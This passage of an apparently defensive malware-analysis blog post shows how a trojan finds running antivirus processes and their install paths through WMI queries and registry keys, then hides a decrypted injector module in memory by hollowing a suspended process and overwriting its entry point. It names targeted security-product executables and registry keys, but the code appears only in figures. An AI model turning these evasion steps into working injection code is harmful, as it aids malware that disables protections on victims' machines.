<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">bdagent.exe - BitDefender</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">UmxCfg.exe - CA</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">fsdfwd.exe - F-Secure</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">rtvscan.exe - Symantec</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">ccSvcHst.exe - Symantec</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">ekrn.exe - Eset</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">tmproxy.exe - Trend Micro</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">RavMonD.exe - Rising</span></div>
</li>
</ul>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm 13mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">If any of the processes listed above is present, the malware attempts to get the complete file path and the file version info of the running security software and injects its malicious code into it. It does this in one of three possible ways:</span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">The first is by using GetModuleFileNameExW from psapi.dll together with GetFileVersionInfoW and VerQueryValueW from version.dll. GetModuleFileNameExW returns the complete file path of the targeted file.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 13mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0rwMT72s5fm5ilR8AlKlFkMmuTX9BU1PHdrw7Pitl_Brov_lfb5hxqRxdlHgHFHkMVziizS6yEni3wa4lB0R_FxoGqcAbqjzHs8Zv8PFJ6XuOhDHY0Le8f2aBK5KvH2Bwx6Iit3Fy/s1600/GetModuleFileNameExW.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="89" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0rwMT72s5fm5ilR8AlKlFkMmuTX9BU1PHdrw7Pitl_Brov_lfb5hxqRxdlHgHFHkMVziizS6yEni3wa4lB0R_FxoGqcAbqjzHs8Zv8PFJ6XuOhDHY0Le8f2aBK5KvH2Bwx6Iit3Fy/s320/GetModuleFileNameExW.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 11a: Using GetModuleFileNameExW to extract the complete file path of the matched running process.</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">The second is a WMI query of the form "SELECT ExecutablePath FROM Win32_Process WHERE ProcessID = %u". WMI (Windows Management Instrumentation) is a core Windows management technology: it gives administrators a means to extract information about the operating system, start a process on a remote computer, and much more. More information on WMI can be found at</span></span> <a href="http://technet.microsoft.com/en-us/library/ee692772.aspx"><span style="color: blue; font-family: Calibri;"><span style="font-size: 11pt;"><u>http://technet.microsoft.com/en-us/library/ee692772.aspx</u></span></span></a><span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9W684RofNL3c6NUdMekcyhMD3rfubM1W9Tef7V0WFr8zkwtc3WAzQluaRlj8-FrbFcimlmFBxNYXQ7Djwa9b5fSIR18wb-7o8Pbo2HnHskWJa9No5Jq6P4IPK3giU_VEkY6sF-tCw/s1600/WMI_Query.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="51" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9W684RofNL3c6NUdMekcyhMD3rfubM1W9Tef7V0WFr8zkwtc3WAzQluaRlj8-FrbFcimlmFBxNYXQ7Djwa9b5fSIR18wb-7o8Pbo2HnHskWJa9No5Jq6P4IPK3giU_VEkY6sF-tCw/s320/WMI_Query.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 11b: Using WMI Query such as "SELECT ExecutablePath FROM Win32_Process WHERE ProcessID = %u"</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">The third is by querying the registry for the installation path pertinent to the matched process. The limitation of this routine is that it only supports avp.exe (Kaspersky), Mcshield.exe (McAfee) and tmproxy.exe (Trend Micro). The registry keys queried can be any of the following:</span></span></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SOFTWARE\KasperskyLab\protected\AVP80\environment</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SOFTWARE\KasperskyLab\protected\AVP11\environment</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SOFTWARE\KasperskyLab\protected\AVP10\environment</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SOFTWARE\KasperskyLab\protected\AVP9\environment</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SOFTWARE\KasperskyLab\protected\AVP8\environment</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SOFTWARE\KasperskyLab\protected\AVP7\environment</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SOFTWARE\kasperskylab\avp7\environment</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SOFTWARE\kasperskylab\avp6\environment</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SOFTWARE\McAfee\VSCore</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SOFTWARE\TrendMicro\NSC\TmProxy</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SOFTWARE\Rising\RIS</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SOFTWARE\Rising\RAV</span></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqUgtAPWOXhVSsQjxlNRmODDaZ1hBW4PJpDiDgKjWN-Q3KqaPbMtWX4jSa8334Y-zdu8khe57KhvyyG0ZXhgaPkI2x4Xw6IirTj4b6cnEkoBvhLQFO_b8XiF23MwfC2uDIoERQOwsQ/s1600/reg_entries.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="125" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqUgtAPWOXhVSsQjxlNRmODDaZ1hBW4PJpDiDgKjWN-Q3KqaPbMtWX4jSa8334Y-zdu8khe57KhvyyG0ZXhgaPkI2x4Xw6IirTj4b6cnEkoBvhLQFO_b8XiF23MwfC2uDIoERQOwsQ/s320/reg_entries.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 11c: Using registry entries to determine the installation path.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">If no security software is installed or running, the malware defaults to one of the following files:</span></span></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">For 32-bit operating systems:</span><br />
<ul style="margin-bottom: 0mm; margin-top: 0mm;">
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 28pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">%SystemRoot%\system32\lsass.exe</span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 28pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">%SystemRoot%\system32\winlogon.exe</span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 28pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">%SystemRoot%\system32\svchost.exe</span></div>
</li>
</ul>
</div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">For 64-bit operating systems:</span><br />
<ul style="margin-bottom: 0mm; margin-top: 0mm;">
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 28pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">%SystemRoot%\syswow64\lsass.exe</span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 28pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">%SystemRoot%\syswow64\winlogon.exe</span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 28pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">%SystemRoot%\syswow64\svchost.exe</span></div>
</li>
</ul>
</div>
</li>
</ul>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">The executable checks the image of the targeted file to see whether it is Intel 386 (32-bit) or AMD64 (64-bit). What’s interesting is that although the malware author appears to check for 64-bit systems, the procedure is actually empty and returns NULL. It’s as if 64-bit support was planned but never implemented.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0SGIgF2NhzsUenvJq-SXJCm3XpHsu7K9QKkZDdF8xnoixTEtKaya5Xs8DRQjfEQk7lTP371ARRxeIMzduBfFMkqWrUok8TkygKRzQGSrWOIJ25tx2iaLy2HpggSD5SgU3jlficntY/s1600/64bit_support_plan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="55" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0SGIgF2NhzsUenvJq-SXJCm3XpHsu7K9QKkZDdF8xnoixTEtKaya5Xs8DRQjfEQk7lTP371ARRxeIMzduBfFMkqWrUok8TkygKRzQGSrWOIJ25tx2iaLy2HpggSD5SgU3jlficntY/s320/64bit_support_plan.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 12: 64-Bit support is planned but the procedure only returns NULL.</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">It then creates a mutex name based on the process ID of the targeted file and goes on to decrypt yet another module file (MD5 f5ee03fed0133bb06d4cc52b0232fec0). This executable module is detected by Vipre as Trojan.Win32.Generic!BT.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1SadI_Hxl3iXsk2AlyuS4wLuNK0_Va8oOyKJ8RZlRyjEp13Oa9kC4mgx7qfuE24aRxo3qu_iE7uQQtjQuFOgD_cXi0yMFhEwFfoliUKbskAF8zrYGENf-6hBBKyVJeoLu2LpkespZ/s1600/Mutex_name.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1SadI_Hxl3iXsk2AlyuS4wLuNK0_Va8oOyKJ8RZlRyjEp13Oa9kC4mgx7qfuE24aRxo3qu_iE7uQQtjQuFOgD_cXi0yMFhEwFfoliUKbskAF8zrYGENf-6hBBKyVJeoLu2LpkespZ/s320/Mutex_name.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 13a: Mutex name creation based on PID of target file.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> I have taken the liberty of inserting comments to its decryption routine for the interest of our readers.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinN0WHc4XlRf_MwXykQcInkrkWXp1zfaQOIrV41fj3WNFldcBzXuAIMYk_2vWTTMeAWYWwJcB-RPnQq9V64zY2qVqBEwpielMkC8y1wqAxZuRzUJ-Y6Wv6hoNAZKFISNG0kf4mbH7w/s1600/decrypt_injector_mod.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinN0WHc4XlRf_MwXykQcInkrkWXp1zfaQOIrV41fj3WNFldcBzXuAIMYk_2vWTTMeAWYWwJcB-RPnQq9V64zY2qVqBEwpielMkC8y1wqAxZuRzUJ-Y6Wv6hoNAZKFISNG0kf4mbH7w/s320/decrypt_injector_mod.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 13b: Decrypting the injector module.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">The malware then spawns a suspended process of the targeted file in memory. If it is running under a 64-bit environment, it does nothing and terminates itself.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMuM33FZGNtdtGF7vtgaTpLAjwxkBvc8SgFqIch0m_gQ_GhYAK8jiEsrPCxIIPhaF8SeL4pmbDuY5EHdamx72tdI_eg6FoOEDyZTPlTbS0-e9B3Pwv76LGAFmn8PlyRAboaXsYCwmF/s1600/process_create.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="33" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMuM33FZGNtdtGF7vtgaTpLAjwxkBvc8SgFqIch0m_gQ_GhYAK8jiEsrPCxIIPhaF8SeL4pmbDuY5EHdamx72tdI_eg6FoOEDyZTPlTbS0-e9B3Pwv76LGAFmn8PlyRAboaXsYCwmF/s320/process_create.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 14: A suspended, no-window, detached process was spawned in memory.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> The malware then reads the first 0x1000 bytes of the targeted file into memory using the ReadProcessMemory function in order to parse the PE header and save the targeted file’s entry point on the stack.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJGOYI3NBrXwpgeT2OSTUm16yIrx9SW-iZ3cXeT-KdlYdIA6g6iQZxq5WLc_vuMgWk09CdQZoOT_PPbbc7N-Fm3yuwz1lQoOqb5_H5Y2Lt74R4dlXpeXDbMLzHMQMsS2yprDr-44th/s1600/readprocessmem.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="70" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJGOYI3NBrXwpgeT2OSTUm16yIrx9SW-iZ3cXeT-KdlYdIA6g6iQZxq5WLc_vuMgWk09CdQZoOT_PPbbc7N-Fm3yuwz1lQoOqb5_H5Y2Lt74R4dlXpeXDbMLzHMQMsS2yprDr-44th/s320/readprocessmem.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 15: ReadProcessMemory in action; the first 0x1000 bytes of the targeted file are copied into memory.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div style="line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<div style="font-family: Tahoma;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> The targeted file’s entry point is then overwritten with a jump to the injector module’s entry point (f5ee03fed0133bb06d4cc52b0232fec0) before the suspended process is resumed. 
This is how the malware passes execution from the targeted file to its own component file. Remember that the targeted file is non-malicious in nature, but the code that it jumps to is malicious. This is done to hide the component file and avoid detection by antivirus products. Also take note that NO component files were dropped or created by the malware; all of this was done in memory.</span></span></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 15px;"> </span></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP3Oca_H-EX55-94RLAMQglWvbBZMntaLCHeHxxamYQy8XtSkKYDYRB0P_r3wAjkl9gz6VTAVQ7ptJ15mK8g7VjP0buimit0Zr4qU58Q7rR0_MmGdMSsxwWR5iR1eIL3EbX6mshoY7/s1600/overwrite_host_ep.png" imageanchor="1" style="font-family: Tahoma; margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 0mm;"><img border="0" height="46" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP3Oca_H-EX55-94RLAMQglWvbBZMntaLCHeHxxamYQy8XtSkKYDYRB0P_r3wAjkl9gz6VTAVQ7ptJ15mK8g7VjP0buimit0Zr4qU58Q7rR0_MmGdMSsxwWR5iR1eIL3EbX6mshoY7/s320/overwrite_host_ep.png" width="320" /></a></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 15a: Bytes in targeted file’s entry point are overwritten to pass the execution to malware’s own entry point</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><b><i>f5ee03fed0133bb06d4cc52b0232fec0 – The Executable Module a.k.a. “The Injector”</i></b></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><b><br /></b></span></span></div>
<div style="line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<div style="font-family: Tahoma;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> When code execution is passed to the injector module (f5ee03fed0133bb06d4cc52b0232fec0) in memory, the first thing it does is fill in and rebuild its Import Address Table.</span></span></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 15px;"> </span></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ5fOUoiWcZ-ZpeAvuUAL3OJWG9BgvufYDPJJrhxOyW3LfODEUxhd0aIJTzetl8VprECRVPEDE9pMx6X2I-iy_atMRJIz7CGk6dmq9xDZ0ieDUZLu5Om6mx7w4z80nkbN_Egt9RWWn/s1600/rebuild_iat.png" imageanchor="1" style="font-family: Tahoma; margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 0mm;"><img border="0" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ5fOUoiWcZ-ZpeAvuUAL3OJWG9BgvufYDPJJrhxOyW3LfODEUxhd0aIJTzetl8VprECRVPEDE9pMx6X2I-iy_atMRJIz7CGk6dmq9xDZ0ieDUZLu5Om6mx7w4z80nkbN_Egt9RWWn/s320/rebuild_iat.png" width="320" /></a></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 16: Rebuilding Import Address Table</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
